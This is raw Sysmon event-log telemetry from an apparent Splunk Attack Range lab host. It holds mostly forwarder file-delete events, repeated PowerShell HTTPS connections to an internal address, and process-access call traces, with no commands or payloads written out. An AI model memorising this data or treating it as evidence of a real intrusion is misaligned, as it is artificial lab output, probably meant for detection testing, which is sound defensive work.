AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBD04B0D31356D6338FA0ED5405B855,SHA256=187C1B03BB566B27A0ECDD964CB785271C4C54A05CF476806B6255952B5CDD1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:49.680{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3418A0F29E3FFA615FBA0B01DD992159,SHA256=B6617A91A8F169898C2AC276B71D3BBFAE901FD50D5349159D14A3D1E3A9FE84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:19.198{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50544-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:50.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F42EFA15BF76495C2F9EC37ABBCD245,SHA256=F6E884B33BEE5F1FD0AD8A6D7B37C73AE4D6FDB8F6FB9F3897C7E1E5B271082B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:51.724{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC2BDA78D1E3D5533725F012A8D8DA2,SHA256=3A10C5A4C6D7D5A162F289BAE41C84BD4230A145B91C0FF5656BA184F0DC887B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:52.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851D7162CB199F2A456D64B5C1F1BF68,SHA256=2E4B8518EA4DE7DF6355014852975F8BD74FA04AF1A52E0986BAC19B9DF8BA4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:53.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DDC3671944894CA5DDB44B294CB432,SHA256=A580842EA347A6E8447E0F258E92D6CF78629ABB11114F3D205D397A41854CA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:53.658{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8118C06C8C10C0BDBFC02A4AC9BADCC5,SHA256=A224CADB8D83E0F731940BAE6ED087EAE191B67C0B18B37E3A458DFBCA47EFFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:22.940{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50545-false10.0.1.12-8000- 
23542300x800000000000000036497561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:54.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A1D2D46FE7B1DFBAA9CAC9F91185ED1,SHA256=00FA2A638541C7ABCBD09FED5CB00B6366B49C5B4E205322C9CD85B6B2DECCFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.208{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50546-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAFC71453D80ED3D68CB243213D0BE22,SHA256=71AA2677266DF4EDE5E100E0F1424637A5C25DB5A7B42B5097C5B89E304DC31C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:56.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F4FDBA02EE903777699A91AD76BA55,SHA256=94ACEBB81135F86EA35EC4A0B796FD884C8A8166EAA26322574A72E8AFA4A3D2,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036497563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:56.288{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a333cb7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:57.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427EB368789E52017AAE6DE80E79B12B,SHA256=65F8CCF3D7288C6A679364071CF493661211298A962B9138CEFFEB5231B1753B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:58.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B7D6C708467C6CFD065BC58BEEB926C,SHA256=2FCB52CC9F92A26CCC3FFF820631BCC80EB7B85947C1FCA1BE4C3011B1170FE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:28.934{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50547-false10.0.1.12-8000- 23542300x800000000000000036497569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:59.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3BC5C27E592C4E36119F120EC11C2B,SHA256=FF8906E3FE0C1B8C5B52619721566CE5D3EC07736748D9C9810AEADE876CFBC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:59.577{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C1EAE848D1F1A18D696E009814747DBE,SHA256=719A76441EF854CE2AA62E914B2E18FDE74E1B1FEECCC12120CD5E136AC09078,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:00.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC0A94156899E46ADBBB98FABD923E32,SHA256=4B73F78BFA1BBF56AE68DD42E1F40C7B9BBD922528E55E30FB187AA7EBFEA4DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:30.219{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50548-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:01.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554DA068BC2494BE05971F41A825E6B3,SHA256=A9437CFBFFC3C1E906EAD05BAADA72F2ADD87129D72B6065DCCAE7E12ED9ED40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:02.974{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4320F39275BABE6DD0F24B4F6E4F7C,SHA256=9F8AB3EF3AF272401408D68C9944EB3B69BA7CA6F677BA6F55547F06A2915EC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:03.988{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E0EC2976E34E07BC86CA12B86E2A69,SHA256=FF22713F7219C8A07BC27F0300D768E0A545D127FB7D1FF6DE8E3BB9BB1EDC0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.689{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50549-false10.0.1.12-8000- 23542300x800000000000000036497575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:04.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=602203DD24AECDAC50CE80F88653A6C8,SHA256=FAECE409B676C9B3FBA31F3BCD443C66E4B978029DB8D13E6B06A64FCDF3ABCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:35.220{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50550-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:05.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A375B9B06C40DB4C3C0AC743BDDB916E,SHA256=DCE444CB60FFFE28B3F252BEFEA54E3A20BFE6731FF091764778B20871D07516,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:06.033{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482CAB45AA4C05381365A0D384E735D4,SHA256=2CCA0108FE1BBBC40FEA754C4449029ECF0C8C87AED85D0AABF47BE416495C2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.952{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.950{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:07.950{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:07.949{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:07.949{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A10F-6140-8656-04000000C801}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:26.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B490EB52F4799CC2D13DC2ADB77EAC20,SHA256=FB61FA0EF76C567CC63B2A8C143A32BC5EEFDDB39885686DA5C77799C4249DEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:27.566{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B0114F5EB18C3CE5F9EDED3D9E5EC7,SHA256=45980F54C1B50F919502B0AEDFCC1AF44FBDB7C116002D6F694480FD03E6895C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:56.731{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50558-false10.0.1.12-8000- 23542300x800000000000000036497653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:28.749{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFFD6C6778463E090BB0B91598C2433B,SHA256=B75C5CEE0A993CF0B7AE99FED7643CD1446E9EF98869736C3B90FEC89C971185,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:28.581{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43E5324D852CB5C987F8B59EC43D3604,SHA256=CCC088256601A1146D5FEB6A3A154C48806BD8BF8AAFB461D8091E06187F1DA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:29.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CCE625A98A7A2DC1517CE94DC8EB85,SHA256=D9D879A6968B230018E578A3730F6A15E125535485A02C02C1627E144CFBDDCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:59.282{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50559-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:30.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A829F43C2CC0BC69887D8F1FAA6F461A,SHA256=5D5EAA25E8353439814287FF87CDC2E174BB6169B4B434115632C7ED66EE616E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:31.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47678ED78DCF4ECAB43351369DF3488B,SHA256=3DC7FB88BD126A48A326246BE5464DDBE01FC3D0B6D06ECF8693F18E0FE79DE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:32.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56E0B48C3652E70E0A5A08637637DF9,SHA256=5536D425000FD1A256043454FD954F397D5D410EA1933DEFBA744107025B1992,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:32.560{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
